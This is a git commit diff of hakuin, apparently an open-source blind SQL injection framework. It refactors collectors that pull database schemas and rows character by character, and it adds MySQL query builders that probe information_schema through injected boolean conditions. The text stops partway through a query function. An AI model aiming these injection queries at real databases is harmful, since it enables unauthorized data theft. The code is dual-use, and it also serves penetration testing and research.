mirror of https://github.com/pruzko/hakuin synced 2024-10-18 09:48:06 +02:00

major refactoring (DBMS, collectors) & unicode support

This commit is contained in:
Jakub Pruzinec 2023-10-04 19:13:22 +08:00
parent 042fa5df91
commit 9932d8dacd
17 changed files with 1214 additions and 622 deletions

1
.gitignore vendored

@@ -163,3 +163,4 @@ cython_debug/
# Hakuin
tmp/
demos/

@@ -1,7 +1,6 @@
import hakuin
import hakuin.search_algorithms as search_alg
import hakuin.collectors as collect
from hakuin.utils import CHARSET_SCHEMA
@@ -33,24 +32,23 @@ class Extractor:
ctx = search_alg.Context(None, None, None, None)
n_rows = search_alg.IntExponentialSearch(
self.requester,
self.dbms.count_tables,
upper=8
n_rows = search_alg.IntExponentialBinarySearch(
requester=self.requester,
query_cb=self.dbms.TablesQueries.rows_count,
upper=8,
find_range=True,
).run(ctx)
if strategy == 'binary':
return collect.BinaryTextCollector(
self.requester,
self.dbms.char_tables,
charset=CHARSET_SCHEMA,
requester=self.requester,
queries=self.dbms.TablesQueries,
).run(ctx, n_rows)
else:
return collect.ModelTextCollector(
self.requester,
self.dbms.char_tables,
requester=self.requester,
queries=self.dbms.TablesQueries,
model=hakuin.get_model_tables(),
charset=CHARSET_SCHEMA,
).run(ctx, n_rows)
@@ -70,24 +68,23 @@ class Extractor:
ctx = search_alg.Context(table, None, None, None)
n_rows = search_alg.IntExponentialSearch(
self.requester,
self.dbms.count_columns,
upper=8
n_rows = search_alg.IntExponentialBinarySearch(
requester=self.requester,
query_cb=self.dbms.ColumnsQueries.rows_count,
upper=8,
find_range=True,
).run(ctx)
if strategy == 'binary':
return collect.BinaryTextCollector(
self.requester,
self.dbms.char_columns,
charset=CHARSET_SCHEMA,
requester=self.requester,
queries=self.dbms.ColumnsQueries,
).run(ctx, n_rows)
else:
return collect.ModelTextCollector(
self.requester,
self.dbms.char_columns,
requester=self.requester,
queries=self.dbms.ColumnsQueries,
model=hakuin.get_model_columns(),
charset=CHARSET_SCHEMA,
).run(ctx, n_rows)
@@ -104,15 +101,15 @@ class Extractor:
ctx = search_alg.Context(table, column, None, None)
d_type = search_alg.BinarySearch(
self.requester,
self.dbms.meta_type,
requester=self.requester,
query_cb=self.dbms.MetaQueries.column_data_type,
values=self.dbms.DATA_TYPES,
).run(ctx)
return {
'type': d_type,
'nullable': self.requester.request(ctx, self.dbms.meta_is_nullable(ctx)),
'pk': self.requester.request(ctx, self.dbms.meta_is_pk(ctx)),
'nullable': self.requester.request(ctx, self.dbms.MetaQueries.column_is_nullable(ctx)),
'pk': self.requester.request(ctx, self.dbms.MetaQueries.column_is_pk(ctx)),
}
@@ -140,7 +137,7 @@ class Extractor:
return schema
def extract_column(self, table, column, strategy='dynamic', charset=None, n_rows=None, n_rows_guess=128):
def extract_column(self, table, column, strategy='dynamic', charset=None, n_rows_guess=128):
'''Extracts text column.
Params:
@@ -152,7 +149,6 @@
'dynamic' for dynamically choosing the best search strategy and
opportunistically guessing strings
charset (list|None): list of possible characters
n_rows (int|None): number of rows
n_rows_guess (int|None): approximate number of rows
Returns:
@@ -162,32 +158,30 @@
assert strategy in allowed, f'Invalid strategy: {strategy} not in {allowed}'
ctx = search_alg.Context(table, column, None, None)
if n_rows is None:
n_rows = search_alg.IntExponentialSearch(
self.requester,
self.dbms.count_rows,
upper=n_rows_guess
).run(ctx)
n_rows = search_alg.IntExponentialBinarySearch(
requester=self.requester,
query_cb=self.dbms.RowsQueries.rows_count,
upper=n_rows_guess,
find_range=True,
).run(ctx)
if strategy == 'binary':
return collect.BinaryTextCollector(
self.requester,
self.dbms.char_rows,
requester=self.requester,
queries=self.dbms.RowsQueries,
charset=charset,
).run(ctx, n_rows)
elif strategy in ['unigram', 'fivegram']:
ngram = 1 if strategy == 'unigram' else 5
return collect.AdaptiveTextCollector(
self.requester,
self.dbms.char_rows,
requester=self.requester,
queries=self.dbms.RowsQueries,
model=hakuin.Model(ngram),
charset=charset,
).run(ctx, n_rows)
else:
return collect.DynamicTextCollector(
self.requester,
self.dbms.char_rows,
self.dbms.string_rows,
requester=self.requester,
queries=self.dbms.RowsQueries,
charset=charset,
).run(ctx, n_rows)
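For orientation, a minimal usage sketch of the refactored API (my_requester stands in for a hypothetical Requester implementation; the calls mirror the signatures above):

from hakuin import Extractor
from hakuin.dbms import SQLite

ext = Extractor(requester=my_requester, dbms=SQLite())  # my_requester: hypothetical Requester
schema = ext.extract_schema(strategy='model', metadata=True)        # tables, columns, metadata
rows = ext.extract_column('users', 'username', strategy='dynamic')  # one text column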

@@ -26,8 +26,9 @@ class Model:
@property
def order(self):
assert self.model
return self.model.order
if self.model:
return self.model.order
return None
def load(self, file):
@@ -49,7 +50,7 @@ class Model:
Returns:
dict: likelihood distribution
'''
context = context[-(self.order - 1):]
context = [] if self.order == 1 else context[-(self.order - 1):]
while context:
scores = self._scores(context)
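The added guard sidesteps a Python slicing pitfall; a standard-library-only sketch:

# For order == 1, -(order - 1) is -0, and lst[-0:] slices from index 0,
# so a unigram model would receive the whole context instead of an empty one.
context = ['a', 'b', 'c']
assert context[-0:] == ['a', 'b', 'c']
order = 3
assert context[-(order - 1):] == ['b', 'c']  # last two tokens for a trigram model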

@@ -3,284 +3,544 @@ from abc import ABCMeta, abstractmethod
from collections import Counter
import hakuin
from hakuin.utils import tokenize, CHARSET_ASCII, EOS
from hakuin.utils import tokenize, CHARSET_ASCII, EOS, ASCII_MAX, UNICODE_MAX
from hakuin.utils.huffman import make_tree
from hakuin.search_algorithms import Context, BinarySearch, TreeSearch
from hakuin.search_algorithms import Context, BinarySearch, TreeSearch, IntExponentialBinarySearch
class Collector(metaclass=ABCMeta):
'''Abstract class for collectors. Collectors repeatedly run
search algorithms to infer column rows.
search algorithms to extract column rows.
'''
def __init__(self, requester, query_cb):
def __init__(self, requester, queries):
'''Constructor.
Params:
requester (Requester): Requester instance
query_cb (function): query construction function
queries (UniformQueries): injection queries
'''
self.requester = requester
self.query_cb = query_cb
self.queries = queries
def run(self, ctx, n_rows):
'''Run collection.
def run(self, ctx, n_rows, *args, **kwargs):
'''Collects the whole column.
Params:
ctx (Context): inference context
ctx (Context): extraction context
n_rows (int): number of rows in column
Returns:
list: column rows
'''
logging.info(f'Inferring "{ctx.table}.{ctx.column}"...')
logging.info(f'Inferring "{ctx.table}.{ctx.column}"')
data = []
for row in range(n_rows):
ctx = Context(ctx.table, ctx.column, row, None)
res = self._collect_row(ctx)
res = self.collect_row(ctx, *args, **kwargs)
data.append(res)
logging.info(f'({row + 1}/{n_rows}) inferred: {res}')
logging.info(f'({row + 1}/{n_rows}) "{ctx.table}.{ctx.column}": {res}')
return data
@abstractmethod
def _collect_row(self, ctx):
def collect_row(self, ctx, *args, **kwargs):
'''Collects a row.
Params:
ctx (Context): extraction context
Returns:
value: single row
'''
raise NotImplementedError()
class TextCollector(Collector):
'''Collector for text columns.'''
def _collect_row(self, ctx):
def __init__(self, requester, queries, charset=None):
'''Constructor.
Params:
requester (Requester): Requester instance
queries (UniformQueries): injection queries
charset (list|None): list of possible characters, None for default ASCII
'''
super().__init__(requester, queries)
self.charset = charset if charset is not None else CHARSET_ASCII
if EOS not in self.charset:
self.charset.append(EOS)
def run(self, ctx, n_rows):
'''Collects the whole column.
Params:
ctx (Context): extraction context
n_rows (int): number of rows in column
Returns:
list: column rows
'''
rows_are_ascii = self.check_rows_are_ascii(ctx)
return super().run(ctx, n_rows, rows_are_ascii)
def collect_row(self, ctx, rows_are_ascii):
'''Collects a row.
Params:
ctx (Context): extraction context
rows_are_ascii (bool): ASCII flag for all rows in column
Returns:
string: single row
'''
row_is_ascii = True if rows_are_ascii else self.check_row_is_ascii(ctx)
ctx.s = ''
while True:
c = self._collect_char(ctx)
c = self.collect_char(ctx, row_is_ascii)
if c == EOS:
return ctx.s
ctx.s += c
@abstractmethod
def _collect_char(self, ctx):
def collect_char(self, ctx, row_is_ascii):
'''Collects a character.
Params:
ctx (Context): extraction context
row_is_ascii (bool): row ASCII flag
Returns:
string: single character
'''
raise NotImplementedError()
def check_rows_are_ascii(self, ctx):
'''Finds out whether all rows in the column are ASCII.
Params:
ctx (Context): extraction context
Returns:
bool: ASCII flag
'''
query = self.queries.rows_are_ascii(ctx)
return self.requester.request(ctx, query)
def check_row_is_ascii(self, ctx):
'''Finds out whether the current row is ASCII.
Params:
ctx (Context): extraction context
Returns:
bool: ASCII flag
'''
query = self.queries.row_is_ascii(ctx)
return self.requester.request(ctx, query)
def check_char_is_ascii(self, ctx):
'''Finds out whether the current character is ASCII.
Params:
ctx (Context): extraction context
Returns:
bool: ASCII flag
'''
query = self.queries.char_is_ascii(ctx)
return self.requester.request(ctx, query)
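Taken together, the three checks let broad, cheap queries spare many narrow ones; a sketch of how they compose inside the collector (names as defined above):

# One column-level request can mark every row ASCII; failing that, one
# row-level request can still spare a check per character.
rows_are_ascii = self.check_rows_are_ascii(ctx)                # once per column
row_is_ascii = rows_are_ascii or self.check_row_is_ascii(ctx)  # once per row
char_is_ascii = row_is_ascii or self.check_char_is_ascii(ctx)  # once per character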
class BinaryTextCollector(TextCollector):
'''Binary search text collector'''
def __init__(self, requester, query_cb, charset=None):
'''Constructor.
def collect_char(self, ctx, row_is_ascii):
'''Collects a character.
Params:
requester (Requester): Requester instance
query_cb (function): query construction function
charset (list|None): list of possible characters
ctx (Context): extraction context
row_is_ascii (bool): row ASCII flag
Returns:
list: column rows
string: single character
'''
super().__init__(requester, query_cb)
self.charset = charset if charset else CHARSET_ASCII
return self._collect_or_emulate_char(ctx, row_is_ascii)[0]
def _collect_char(self, ctx):
return BinarySearch(
self.requester,
self.query_cb,
values=self.charset,
).run(ctx)
def emulate_char(self, ctx, row_is_ascii, correct):
'''Emulates character collection without sending requests.
Params:
ctx (Context): extraction context
row_is_ascii (bool): row ASCII flag
correct (str): correct character
Returns:
int: number of requests necessary
'''
return self._collect_or_emulate_char(ctx, row_is_ascii, correct)[1]
def _collect_or_emulate_char(self, ctx, row_is_ascii, correct=None):
total_queries = 0
# custom charset or ASCII
if self.charset is not CHARSET_ASCII or row_is_ascii or self._check_or_emulate_char_is_ascii(ctx, correct):
search_alg = BinarySearch(
requester=self.requester,
query_cb=self.queries.char,
values=self.charset,
correct=correct,
)
res = search_alg.run(ctx)
total_queries += search_alg.n_queries
if res is not None:
return res, total_queries
# Unicode
correct_ord = ord(correct) if correct is not None else correct
search_alg = IntExponentialBinarySearch(
requester=self.requester,
query_cb=self.queries.char_unicode,
lower=ASCII_MAX + 1,
upper=UNICODE_MAX + 1,
find_range=False,
correct=correct_ord,
)
res = search_alg.run(ctx)
total_queries += search_alg.n_queries
return chr(res), total_queries
def _check_or_emulate_char_is_ascii(self, ctx, correct):
if correct is None:
return self.check_char_is_ascii(ctx)
return correct.isascii()
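A rough cost estimate for the Unicode fallback (a sketch assuming a plain binary search over the remaining code points):

import math

# Once a character is known to be non-ASCII, it is binary-searched in
# (ASCII_MAX, UNICODE_MAX], which costs about log2(0x10ffff - 0x7f) requests.
print(math.ceil(math.log2(0x10ffff - 0x7f)))  # 21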
class ModelTextCollector(TextCollector):
'''Language model-based text collector.'''
def __init__(self, requester, query_cb, model, charset=None):
def __init__(self, requester, queries, model, charset=None):
'''Constructor.
Params:
requester (Requester): Requester instance
query_cb (function): query construction function
queries (UniformQueries): injection queries
model (Model): language model
charset (list|None): list of possible characters
Returns:
list: column rows
'''
super().__init__(requester, query_cb)
super().__init__(requester, queries, charset)
self.model = model
self.charset = charset if charset else CHARSET_ASCII
self.binary_collector = BinaryTextCollector(
requester=self.requester,
queries=self.queries,
charset=self.charset,
)
def _collect_char(self, ctx):
def collect_char(self, ctx, row_is_ascii):
'''Collects a character.
Params:
ctx (Context): extraction context
row_is_ascii (bool): row ASCII flag
Returns:
string: single character
'''
return self._collect_or_emulate_char(ctx, row_is_ascii)[0]
def emulate_char(self, ctx, row_is_ascii, correct):
'''Emulates character collection without sending requests.
Params:
ctx (Context): extraction context
row_is_ascii (bool): row ASCII flag
correct (str): correct character
Returns:
int: number of requests necessary
'''
return self._collect_or_emulate_char(ctx, row_is_ascii, correct)[1]
def _collect_or_emulate_char(self, ctx, row_is_ascii, correct=None):
n_queries_model = 0
model_ctx = tokenize(ctx.s, add_eos=False)
scores = self.model.scores(context=model_ctx)
c = TreeSearch(
self.requester,
self.query_cb,
search_alg = TreeSearch(
requester=self.requester,
query_cb=self.queries.char,
tree=make_tree(scores),
).run(ctx)
correct=correct,
)
res = search_alg.run(ctx)
n_queries_model = search_alg.n_queries
if c is not None:
return c
if res is not None:
return res, n_queries_model
charset = list(set(self.charset).difference(set(scores)))
return BinarySearch(
self.requester,
self.query_cb,
values=self.charset,
).run(ctx)
res, n_queries_binary = self.binary_collector._collect_or_emulate_char(ctx, row_is_ascii, correct)
return res, n_queries_model + n_queries_binary
class AdaptiveTextCollector(ModelTextCollector):
'''Same as ModelTextCollector but adapts the model.'''
def _collect_char(self, ctx):
c = super()._collect_char(ctx)
def collect_char(self, ctx, row_is_ascii):
c = super().collect_char(ctx, row_is_ascii)
self.model.fit_correct_char(c, partial_str=ctx.s)
return c
class DynamicTextStats:
'''Helper class of DynamicTextCollector to keep track of statistical information.'''
def __init__(self):
self.str_len_mean = 0.0
self.n_strings = 0
self._rpc = {
'binary': {'mean': 0.0, 'hist': []},
'unigram': {'mean': 0.0, 'hist': []},
'fivegram': {'mean': 0.0, 'hist': []},
}
def update_str(self, s):
self.n_strings += 1
self.str_len_mean = (self.str_len_mean * (self.n_strings - 1) + len(s)) / self.n_strings
def update_rpc(self, strategy, n_queries):
rpc = self._rpc[strategy]
rpc['hist'].append(n_queries)
rpc['hist'] = rpc['hist'][-100:]
rpc['mean'] = sum(rpc['hist']) / len(rpc['hist'])
def rpc(self, strategy):
return self._rpc[strategy]['mean']
def best_strategy(self):
return min(self._rpc, key=lambda strategy: self.rpc(strategy))
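A minimal sketch of the bookkeeping (assuming the class as defined above; RPC means are computed over a sliding window of the last 100 characters):

stats = DynamicTextStats()
stats.update_rpc('binary', 7)
stats.update_rpc('binary', 5)
assert stats.rpc('binary') == 6.0  # windowed mean of requests per character
stats.update_str('admin')
assert stats.str_len_mean == 5.0   # running mean of string lengths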
class DynamicTextCollector(TextCollector):
'''Dynamic text collector. The collector keeps statistical information (RPC, requests per character)
for several strategies (binary search, unigram, and five-gram) and dynamically
chooses the best one. In addition, it uses the statistical information to
identify when guessing whole strings is likely to succeed and then uses
previously inferred strings to make the guesses.
'''
def __init__(self, requester, queries, charset=None):
'''Constructor.
Attributes:
GUESS_TH (float): success probability threshold necessary to make guesses
GUESS_SCORE_TH (float): minimal necessary probability to be included in guess tree
Params:
requester (Requester): Requester instance
queries (UniformQueries): injection queries
charset (list|None): list of possible characters
Other Attributes:
model_unigram (Model): adaptive unigram model
model_fivegram (Model): adaptive five-gram model
guess_collector (StringGuessCollector): collector for guessing
'''
super().__init__(requester, queries, charset)
self.binary_collector = BinaryTextCollector(
requester=self.requester,
queries=self.queries,
charset=self.charset,
)
self.unigram_collector = ModelTextCollector(
requester=self.requester,
queries=self.queries,
model=hakuin.Model(1),
charset=self.charset,
)
self.fivegram_collector = ModelTextCollector(
requester=self.requester,
queries=self.queries,
model=hakuin.Model(5),
charset=self.charset,
)
self.guess_collector = StringGuessingCollector(
requester=self.requester,
queries=self.queries,
)
self.stats = DynamicTextStats()
def collect_row(self, ctx, rows_are_ascii):
row_is_ascii = True if rows_are_ascii else self.check_row_is_ascii(ctx)
s = self._collect_string(ctx, row_is_ascii)
self.guess_collector.model.fit_single(s, context=[])
self.stats.update_str(s)
return s
def _collect_string(self, ctx, row_is_ascii):
'''Tries to guess strings or extracts them on a per-character basis if guessing fails'''
exp_c = self.stats.str_len_mean * self.stats.rpc(self.stats.best_strategy())
correct_str = self.guess_collector.collect_row(ctx, exp_c)
if correct_str is not None:
self._update_stats_str(ctx, row_is_ascii, correct_str)
self.unigram_collector.model.fit_data([correct_str])
self.fivegram_collector.model.fit_data([correct_str])
return correct_str
return self._collect_string_per_char(ctx, row_is_ascii)
def _collect_string_per_char(self, ctx, row_is_ascii):
ctx.s = ''
while True:
c = self.collect_char(ctx, row_is_ascii)
self._update_stats(ctx, row_is_ascii, c)
self.unigram_collector.model.fit_correct_char(c, partial_str=ctx.s)
self.fivegram_collector.model.fit_correct_char(c, partial_str=ctx.s)
if c == EOS:
return ctx.s
ctx.s += c
return ctx.s
def collect_char(self, ctx, row_is_ascii):
'''Chooses the best strategy and uses it to infer a character.'''
best = self.stats.best_strategy()
# print(f'b: {self.stats.rpc("binary")}, u: {self.stats.rpc("unigram")}, f: {self.stats.rpc("fivegram")}')
if best == 'binary':
return self.binary_collector.collect_char(ctx, row_is_ascii)
elif best == 'unigram':
return self.unigram_collector.collect_char(ctx, row_is_ascii)
else:
return self.fivegram_collector.collect_char(ctx, row_is_ascii)
def _update_stats(self, ctx, row_is_ascii, correct):
'''Emulates all strategies without sending requests and updates the statistical information.'''
collectors = (
('binary', self.binary_collector),
('unigram', self.unigram_collector),
('fivegram', self.fivegram_collector),
)
for strategy, collector in collectors:
n_queries = collector.emulate_char(ctx, row_is_ascii, correct)
self.stats.update_rpc(strategy, n_queries)
def _update_stats_str(self, ctx, row_is_ascii, correct_str):
'''Like _update_stats but for whole strings.'''
ctx.s = ''
for c in correct_str:
self._update_stats(ctx, row_is_ascii, c)
ctx.s += c
class StringGuessingCollector(Collector):
'''String guessing collector. The collector keeps track of previously extracted
strings and opportunistically tries to guess new strings.
'''
GUESS_TH = 0.5
GUESS_SCORE_TH = 0.01
def __init__(self, requester, query_char_cb, query_string_cb, charset=None):
def __init__(self, requester, queries):
'''Constructor.
Params:
requester (Requester): Requester instance
query_char_cb (function): query construction function for searching characters
query_string_cb (function): query construction function for searching strings
charset (list|None): list of possible characters
queries (UniformQueries): injection queries
Other Attributes:
model_guess: adaptive string-based model for guessing
model_unigram: adaptive unigram model
model_fivegram: adaptive five-gram model
GUESS_TH (float): minimal threshold necessary to start guessing
GUESS_SCORE_TH (float): minimal threshold for strings to be eligible for guessing
model (Model): adaptive string-based model for guessing
'''
self.requester = requester
self.query_char_cb = query_char_cb
self.query_string_cb = query_string_cb
self.charset = charset if charset else CHARSET_ASCII
self.model_guess = hakuin.Model(1)
self.model_unigram = hakuin.Model(1)
self.model_fivegram = hakuin.Model(5)
self._stats = {
'rpc': {
'binary': {'avg': 0.0, 'hist': []},
'unigram': {'avg': 0.0, 'hist': []},
'fivegram': {'avg': 0.0, 'hist': []},
},
'avg_len': 0.0,
'n_strings': 0,
}
super().__init__(requester, queries)
self.model = hakuin.Model(1)
def _collect_row(self, ctx):
s = self._collect_string(ctx)
self.model_guess.fit_single(s, context=[])
def collect_row(self, ctx, exp_alt=None):
'''Tries to construct a guessing Huffman tree and searches it in case of success.
self._stats['n_strings'] += 1
Params:
ctx (Context): extraction context
exp_alt (float|None): expectation for alternative extraction method or None if it does not exist
total = self._stats['avg_len'] * (self._stats['n_strings'] - 1) + len(s)
self._stats['avg_len'] = total / self._stats['n_strings']
return s
def _collect_string(self, ctx):
'''Identifies whether guessing strings is likely to succeed and, if so, makes guesses.
If guessing does not take place or fails, it proceeds with per-character inference.
Returns:
string|None: guessed string or None if skipped or failed
'''
correct_str = self._try_guessing(ctx)
if correct_str is not None:
self._update_stats_str(ctx, correct_str)
self.model_unigram.fit_data([correct_str])
self.model_fivegram.fit_data([correct_str])
return correct_str
ctx.s = ''
while True:
c = self._collect_char(ctx)
self._update_stats(ctx, c)
self.model_unigram.fit_correct_char(c, partial_str=ctx.s)
self.model_fivegram.fit_correct_char(c, partial_str=ctx.s)
if c == EOS:
return ctx.s
ctx.s += c
def _collect_char(self, ctx):
'''Chooses the best strategy and uses it to infer a character.'''
searched_space = set()
c = self._get_strategy(ctx, searched_space, self._best_strategy()).run(ctx)
if c is None:
c = self._get_strategy(ctx, searched_space, 'binary').run(ctx)
return c
def _try_guessing(self, ctx):
'''Tries to construct a guessing Huffman tree and searches it in case of success.'''
tree = self._get_guess_tree(ctx)
exp_alt = exp_alt if exp_alt is not None else float('inf')
tree = self._get_guess_tree(ctx, exp_alt)
return TreeSearch(
self.requester,
self.query_string_cb,
requester=self.requester,
query_cb=self.queries.string,
tree=tree,
).run(ctx)
def _get_guess_tree(self, ctx):
def _get_guess_tree(self, ctx, exp_alt):
'''Identifies whether string guessing is likely to succeed and, if so,
it constructs a Huffman tree from previously inferred strings.
Params:
ctx (Context): extraction context
exp_alt (float): expectation for alternative extraction method
Returns:
utils.huffman.Node|None: Huffman tree constructed from previously inferred
strings that are likely to succeed or None if no such strings were found
utils.huffman.Node|None: Huffman tree constructed from previously inferred strings that are
likely to succeed or None if no such strings were found
'''
# Expectation for per-character inference:
# exp_c = avg_len * best_strategy_rpc
exp_c = self._stats['avg_len'] * self._stats['rpc'][self._best_strategy()]['avg']
# Iteratively compute the best expectation "best_exp_g" by progressively inserting guess
# strings into a candidate guess set "guesses" and computing their expectation "exp_g".
# The iteration stops when the minimal "exp_g" is found.
# exp(G) = p(s in G) * exp_huff(G) + (1 - p(s in G)) * (exp_huff(G) + exp_c)
# exp(G) = p(s in G) * exp_huff(G) + (1 - p(s in G)) * (exp_huff(G) + exp_alt)
guesses = {}
prob_g = 0.0
best_prob_g = 0.0
best_exp_g = float('inf')
best_tree = None
scores = self.model_guess.scores(context=[])
scores = {k: v for k, v in scores.items() if v >= self.GUESS_SCORE_TH and self.model_guess.count(k, []) > 1}
scores = self.model.scores(context=[])
scores = {k: v for k, v in scores.items() if v >= self.GUESS_SCORE_TH and self.model.count(k, []) > 1}
for guess, score in sorted(scores.items(), key=lambda x: x[1], reverse=True):
guesses[guess] = score
tree = make_tree(guesses)
tree_cost = tree.search_cost()
prob_g += score
exp_g = prob_g * tree_cost + (1 - prob_g) * (tree_cost + exp_c)
exp_g = prob_g * tree_cost + (1 - prob_g) * (tree_cost + exp_alt)
if exp_g > best_exp_g:
break
@@ -289,83 +549,7 @@ class DynamicTextCollector(TextCollector):
best_exp_g = exp_g
best_tree = tree
if best_exp_g > exp_c or best_prob_g < self.GUESS_TH:
return None
if best_exp_g <= exp_alt and best_prob_g > self.GUESS_TH:
return best_tree
return best_tree
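A worked instance of the expectation formula (illustrative numbers, not taken from the repo):

# exp(G) = p * exp_huff(G) + (1 - p) * (exp_huff(G) + exp_alt)
prob_g, tree_cost, exp_alt = 0.6, 3.0, 20.0
exp_g = prob_g * tree_cost + (1 - prob_g) * (tree_cost + exp_alt)
print(exp_g)  # 11.0 -> guessing pays off whenever exp_g <= exp_alt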
def _best_strategy(self):
'''Returns the name of the best strategy.'''
return min(self._stats['rpc'], key=lambda strategy: self._stats['rpc'][strategy]['avg'])
def _update_stats(self, ctx, correct):
'''Emulates all strategies without sending any requests and updates the
statistical information.
'''
for strategy in self._stats['rpc']:
searched_space = set()
search_alg = self._get_strategy(ctx, searched_space, strategy, correct)
res = search_alg.run(ctx)
n_queries = search_alg.n_queries
if res is None:
binary_search = self._get_strategy(ctx, searched_space, 'binary', correct)
binary_search.run(ctx)
n_queries += binary_search.n_queries
m = self._stats['rpc'][strategy]
m['hist'].append(n_queries)
m['hist'] = m['hist'][-100:]
m['avg'] = sum(m['hist']) / len(m['hist'])
def _update_stats_str(self, ctx, correct_str):
'''Like _update_stats but for whole strings'''
ctx.s = ''
for c in correct_str:
self._update_stats(ctx, c)
ctx.s += c
def _get_strategy(self, ctx, searched_space, strategy, correct=None):
'''Builds search algorithm configured to search appropriate space.
Params:
ctx (Context): inference context
searched_space (list): list of values that have already been searched
strategy (str): strategy ('binary', 'unigram', 'fivegram')
correct (str|None): correct character
Returns:
SearchAlgorithm: configured search algorithm
'''
if strategy == 'binary':
charset = list(set(self.charset).difference(searched_space))
return BinarySearch(
self.requester,
self.query_char_cb,
values=self.charset,
correct=correct,
)
elif strategy == 'unigram':
scores = self.model_unigram.scores(context=[])
searched_space.union(set(scores))
return TreeSearch(
self.requester,
self.query_char_cb,
tree=make_tree(scores),
correct=correct,
)
else:
model_ctx = tokenize(ctx.s, add_eos=False)
model_ctx = model_ctx[-(self.model_fivegram.order - 1):]
scores = self.model_fivegram.scores(context=model_ctx)
searched_space.union(set(scores))
return TreeSearch(
self.requester,
self.query_char_cb,
tree=make_tree(scores),
correct=correct,
)
return None

@@ -3,54 +3,75 @@ from abc import ABCMeta, abstractmethod
class DBMS(metaclass=ABCMeta):
RE_NORM = re.compile(r'[ \n]+')
DATA_TYPES = []
class Queries(metaclass=ABCMeta):
'''Class for constructing SQL queries.'''
_RE_NORMALIZE = re.compile(r'[ \n]+')
@staticmethod
def normalize(s):
return DBMS.RE_NORM.sub(' ', s).strip()
return Queries._RE_NORMALIZE.sub(' ', s).strip()
@staticmethod
def hex(s):
return s.encode("utf-8").hex()
class MetaQueries(Queries):
'''Interface for queries that infer DB metadata.'''
@abstractmethod
def count_rows(self, ctx, n):
raise NotImplementedError()
def column_data_type(self, ctx, values): raise NotImplementedError()
@abstractmethod
def count_tables(self, ctx, n):
raise NotImplementedError()
def column_is_nullable(self, ctx): raise NotImplementedError()
@abstractmethod
def count_columns(self, ctx, n):
raise NotImplementedError()
def column_is_pk(self, ctx): raise NotImplementedError()
@abstractmethod
def meta_type(self, ctx, values):
raise NotImplementedError()
@abstractmethod
def meta_is_nullable(self, ctx):
raise NotImplementedError()
class UniformQueries(Queries):
'''Interface for queries that can be unified.'''
@abstractmethod
def meta_is_pk(self, ctx):
raise NotImplementedError()
def rows_count(self, ctx): raise NotImplementedError()
@abstractmethod
def rows_are_ascii(self, ctx): raise NotImplementedError()
@abstractmethod
def row_is_ascii(self, ctx): raise NotImplementedError()
@abstractmethod
def char_is_ascii(self, ctx): raise NotImplementedError()
@abstractmethod
def char(self, ctx): raise NotImplementedError()
@abstractmethod
def char_unicode(self, ctx): raise NotImplementedError()
@abstractmethod
def string(self, ctx, values): raise NotImplementedError()
@abstractmethod
def char_rows(self, ctx, values):
raise NotImplementedError()
@abstractmethod
def char_tables(self, ctx, values):
raise NotImplementedError()
@abstractmethod
def char_columns(self, ctx, values):
raise NotImplementedError()
class DBMS(metaclass=ABCMeta):
'''Database Management System (DBMS) interface.
@abstractmethod
def string_rows(self, ctx, values):
raise NotImplementedError()
Attributes:
DATA_TYPES (list): all data types available
MetaQueries (MetaQueries): queries of metadata extraction
TablesQueries (UniformQueries): queries for table names extraction
ColumnsQueries (UniformQueries): queries for column names extraction
RowsQueries (UniformQueries): queries for rows extraction
'''
_RE_ESCAPE = re.compile(r'[a-zA-Z0-9_#@]+')
DATA_TYPES = []
MetaQueries = None
TablesQueries = None
ColumnsQueries = None
RowsQueries = None
@staticmethod
def escape(s):
if DBMS._RE_ESCAPE.fullmatch(s):
return s
assert ']' not in s, f'Cannot escape "{s}"'
return f'[{s}]'
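A quick sketch of the intended behavior (illustrative values):

assert DBMS.escape('users') == 'users'  # identifier made of safe characters passes through
assert DBMS.escape('€uro') == '[€uro]'  # anything else is bracket-quoted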

@@ -1,9 +1,298 @@
from hakuin.utils import EOS
from hakuin.utils import EOS, ASCII_MAX
from .DBMS import DBMS
from .DBMS import DBMS, MetaQueries, UniformQueries
class MySQLMetaQueries(MetaQueries):
def column_data_type(self, ctx, values):
values = [f"'{v}'" for v in values]
query = f'''
SELECT lower(DATA_TYPE) in ({','.join(values)})
FROM information_schema.columns
WHERE TABLE_SCHEMA=database() AND
TABLE_NAME=x'{self.hex(ctx.table)}' AND
COLUMN_NAME=x'{self.hex(ctx.column)}'
'''
return self.normalize(query)
def column_is_nullable(self, ctx):
query = f'''
SELECT IS_NULLABLE='YES'
FROM information_schema.columns
WHERE TABLE_SCHEMA=database() AND
TABLE_NAME=x'{self.hex(ctx.table)}' AND
COLUMN_NAME=x'{self.hex(ctx.column)}'
'''
return self.normalize(query)
def column_is_pk(self, ctx):
query = f'''
SELECT COLUMN_KEY='PRI'
FROM information_schema.columns
WHERE TABLE_SCHEMA=database() AND
TABLE_NAME=x'{self.hex(ctx.table)}' AND
COLUMN_NAME=x'{self.hex(ctx.column)}'
'''
return self.normalize(query)
class MySQLTablesQueries(UniformQueries):
def rows_count(self, ctx, n):
query = f'''
SELECT count(*) < {n}
FROM information_schema.TABLES
WHERE TABLE_SCHEMA=database()
'''
return self.normalize(query)
def rows_are_ascii(self, ctx):
# min() simulates the logical ALL operator here
query = f'''
SELECT min(TABLE_NAME = CONVERT(TABLE_NAME using ASCII))
FROM information_schema.TABLES
WHERE TABLE_SCHEMA=database()
'''
return self.normalize(query)
def row_is_ascii(self, ctx):
query = f'''
SELECT TABLE_NAME = CONVERT(TABLE_NAME using ASCII)
FROM information_schema.TABLES
WHERE TABLE_SCHEMA=database()
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char_is_ascii(self, ctx):
query = f'''
SELECT ord(convert(substr(TABLE_NAME, {len(ctx.s) + 1}, 1) using utf32)) < {ASCII_MAX + 1}
FROM information_schema.TABLES
WHERE TABLE_SCHEMA=database()
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char(self, ctx, values):
has_eos = EOS in values
values = [v for v in values if v != EOS]
values = ''.join(values).encode('utf-8').hex()
if has_eos:
query = f'''
SELECT locate(substr(TABLE_NAME, {len(ctx.s) + 1}, 1), x'{values}')
FROM information_schema.TABLES
WHERE TABLE_SCHEMA=database()
LIMIT 1
OFFSET {ctx.row}
'''
else:
query = f'''
SELECT char_length(TABLE_NAME) != {len(ctx.s)} AND
locate(substr(TABLE_NAME, {len(ctx.s) + 1}, 1), x'{values}')
FROM information_schema.TABLES
WHERE TABLE_SCHEMA=database()
LIMIT 1
OFFSET {ctx.row}
'''
return self.normalize(query)
def char_unicode(self, ctx, n):
query = f'''
